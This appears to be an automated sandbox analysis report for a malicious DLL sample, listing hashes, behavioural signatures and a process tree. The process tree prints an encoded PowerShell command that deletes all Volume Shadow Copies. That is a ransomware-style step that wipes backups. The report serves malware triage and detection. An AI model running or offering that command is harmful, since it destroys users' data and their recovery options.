Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
21-05-2024 14:54
Static task
static1
Behavioral task
behavioral1
Sample
63b1e1b3282cda04bb536c08581e061c_JaffaCakes118.dll
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
63b1e1b3282cda04bb536c08581e061c_JaffaCakes118.dll
Resource
win10v2004-20240226-en
General
-
Target
63b1e1b3282cda04bb536c08581e061c_JaffaCakes118.dll
-
Size
166KB
-
MD5
63b1e1b3282cda04bb536c08581e061c
-
SHA1
7df05722b71329c252ab2f9ce146f74d9fda085b
-
SHA256
ad0e0396572e30f66fd2fd68ac8e0baf6bcafa362846513bdd310875b9da38ed
-
SHA512
0fe74760c5d967f1c84365e343eb097307ba9e81ccab56f2e952492ecbf9763aeeafaaee138fd6171650b8a2b55a9e0c94ef5f596d2845d22081cc63aeec0e8f
-
SSDEEP
3072:MJMawtnGqtWoKeZ9fh1CgnNto6jfHzHYRxNTPlpE:Ww9vteqJggn7oUfHzHYRxNzli
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 904 rundll32.exe 904 rundll32.exe 4596 powershell.exe 4596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeBackupPrivilege 5556 vssvc.exe Token: SeRestorePrivilege 5556 vssvc.exe Token: SeAuditPrivilege 5556 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 3296 wrote to memory of 904 3296 rundll32.exe rundll32.exe PID 3296 wrote to memory of 904 3296 rundll32.exe rundll32.exe PID 3296 wrote to memory of 904 3296 rundll32.exe rundll32.exe PID 904 wrote to memory of 4596 904 rundll32.exe powershell.exe PID 904 wrote to memory of 4596 904 rundll32.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\63b1e1b3282cda04bb536c08581e061c_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\63b1e1b3282cda04bb536c08581e061c_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5556
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3992 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:81⤵PID:5820
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82